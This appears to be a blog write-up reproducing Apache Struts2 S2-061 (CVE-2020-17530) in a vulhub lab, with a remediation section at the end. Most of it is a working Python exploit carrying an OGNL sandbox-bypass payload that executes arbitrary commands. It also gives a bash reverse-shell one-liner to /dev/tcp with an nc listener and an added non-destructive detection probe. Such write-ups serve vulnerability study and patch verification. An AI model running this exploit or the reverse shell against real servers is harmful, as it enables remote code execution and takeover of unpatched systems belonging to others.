Vulnerability overview
Apache Struts2 is a web framework for developing Java EE web applications. On 8 December 2020 Apache disclosed S2-061 (CVE-2020-17530), a remote code execution vulnerability in Struts: when a developer applies the forced OGNL evaluation syntax %{...} to raw, unvalidated user input in a tag attribute, the attribute value is evaluated a second time as OGNL, so an attacker who controls that input can craft a payload that executes arbitrary commands on the server.
Affected versions
Apache Struts2: 2.0.0 - 2.5.25
Reproduction
Set up the vulnerable environment with the vulhub image and start it:
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
docker-compose up -d
Confirm the container is up and listening on port 8080:
╰─$ docker ps
CONTAINER ID   IMAGE                   COMMAND                  CREATED          STATUS          PORTS                    NAMES
e60ea5e361ff   vulhub/struts2:2.5.25   "/usr/local/bin/mvn-…"   34 minutes ago   Up 34 minutes   0.0.0.0:8080->8080/tcp   s2-061_struts2_1
The payload below runs the command through freemarker.template.utility.Execute, which ends up in Runtime.exec(String). That call tokenizes the string on whitespace and never invokes a shell, so the redirections in a bash reverse-shell one-liner would be handed to bash as literal arguments instead of being interpreted. The command therefore has to be base64-wrapped first; the online Java Runtime.exec() payload generator does this:
http://www.jackson-t.ca/runtime-exec-payloads.html
bash -i >& /dev/tcp/ip/port 0>&1
Replace ip and port with your listener (for example nc -lvnp port) before encoding, and pass the encoded form as the command argument of the script below.
Exploit script (the command is injected into the OGNL expression sent in the id parameter, and the command output is read back from the id attribute of the rendered <a> tag):

import requests
import sys
from urllib.parse import quote
from lxml import etree


def exp(url, cmd):
    # URL-encoded OGNL: obtain an InstanceManager from #application, use a BeanMap to reach
    # the value stack's memberAccess and empty its excludedClasses / excludedPackageNames
    # (sandbox bypass), then run the command via freemarker.template.utility.Execute.
    # cmd is percent-encoded so spaces, & and # in the command do not break the query string.
    payload = "%25%7b(%27ol4three%2cenjoy_it%27).(%23UnicodeSec+%3d+%23application%5b%27org.apache.tomcat.InstanceManager%27%5d).(%23potats0%3d%23UnicodeSec.newInstance(%27org.apache.commons.collections.BeanMap%27)).(%23stackvalue%3d%23attr%5b%27struts.valueStack%27%5d).(%23potats0.setBean(%23stackvalue)).(%23context%3d%23potats0.get(%27context%27)).(%23potats0.setBean(%23context)).(%23sm%3d%23potats0.get(%27memberAccess%27)).(%23emptySet%3d%23UnicodeSec.newInstance(%27java.util.HashSet%27)).(%23potats0.setBean(%23sm)).(%23potats0.put(%27excludedClasses%27%2c%23emptySet)).(%23potats0.put(%27excludedPackageNames%27%2c%23emptySet)).(%23exec%3d%23UnicodeSec.newInstance(%27freemarker.template.utility.Execute%27)).(%23cmd%3d%7b%27" + quote(cmd, safe='') + "%27%7d).(%23res%3d%23exec.exec(%23cmd))%7d"
    tturl = url + "/?id=" + payload
    r = requests.get(tturl)
    page = etree.HTML(r.text)
    # The evaluated expression (command output) is rendered into <a id="...">.
    data = page.xpath('//a[@id]/@id')
    if not data:
        print("[-] no <a id=...> in the response; target may not be vulnerable")
        return
    print(data[0])


if __name__ == '__main__':
    print('+------------------------------------------------------------+')
    print('+ EXP: python struts2-061-poc.py http://1.1.1.1:8081 id       +')
    print('+ VER: Struts 2.0.0-2.5.25                                    +')
    print('+------------------------------------------------------------+')
    print('+ S2-061 RCE && CVE-2020-17530                                +')
    print('+------------------------------------------------------------+')
    if len(sys.argv) != 3:
        print("[+] usage: python struts2-061-poc.py http://ip:port command")
        print("[+]============================================================")
        sys.exit()
    url = sys.argv[1]
    cmd = sys.argv[2]
    exp(url, cmd)
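Before firing a reverse shell it is worth confirming the forced double evaluation without executing anything. The block below is an added example (not from the original post): it sends %{A*B} in the id parameter and looks for the product in the rendered <a id="..."> attribute. A vulnerable application evaluates the expression and renders 54289; a patched or unaffected one echoes the literal text or nothing. Like the exploit above, it assumes the target page renders the id request parameter into an anchor's id attribute (the vulhub test application does). Only the standard library is used; the default target URL is a placeholder.

```python
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Added example (not from the original post): non-destructive S2-061 check.


class _AnchorIds(HTMLParser):
    """Collect the id attribute of every <a> element in the response body."""

    def __init__(self):
        super().__init__()
        self.ids = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "id" and value is not None:
                    self.ids.append(value)


def extract_anchor_ids(html: str) -> list:
    parser = _AnchorIds()
    parser.feed(html)
    return parser.ids


def build_probe_url(base_url: str, a: int, b: int) -> str:
    # Percent-encode everything so %, { and } reach the server intact.
    expr = urllib.parse.quote("%{" + f"{a}*{b}" + "}", safe="")
    return base_url.rstrip("/") + "/?id=" + expr


def is_vulnerable_response(html: str, a: int, b: int) -> bool:
    """True only if the multiplication was evaluated server-side."""
    return str(a * b) in extract_anchor_ids(html)


def probe(base_url: str, a: int = 233, b: int = 233, timeout: float = 10) -> bool:
    """Send the arithmetic probe and report whether it was evaluated."""
    req = urllib.request.Request(build_probe_url(base_url, a, b),
                                 headers={"User-Agent": "s2-061-check"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return is_vulnerable_response(body, a, b)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8080"
    print("vulnerable" if probe(target) else "not evaluated (patched or page differs)")
```

Pick operands whose product is unlikely to appear as an existing element id on the page; a false negative here only means the probe page is not the one that echoes the parameter, not that the application is safe.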
Remediation
Upgrade Apache Struts to 2.5.26 or later (the release that fixes S2-061), and stop applying forced OGNL evaluation (%{...}) to raw user input in tag attributes; see the advisory:
https://cwiki.apache.org/confluence/display/WW/S2-061
References
https://mp.weixin.qq.com/s/rcfXIBSpNtgCFua0yUK_ew
From: ol4three.com | Author: ol4three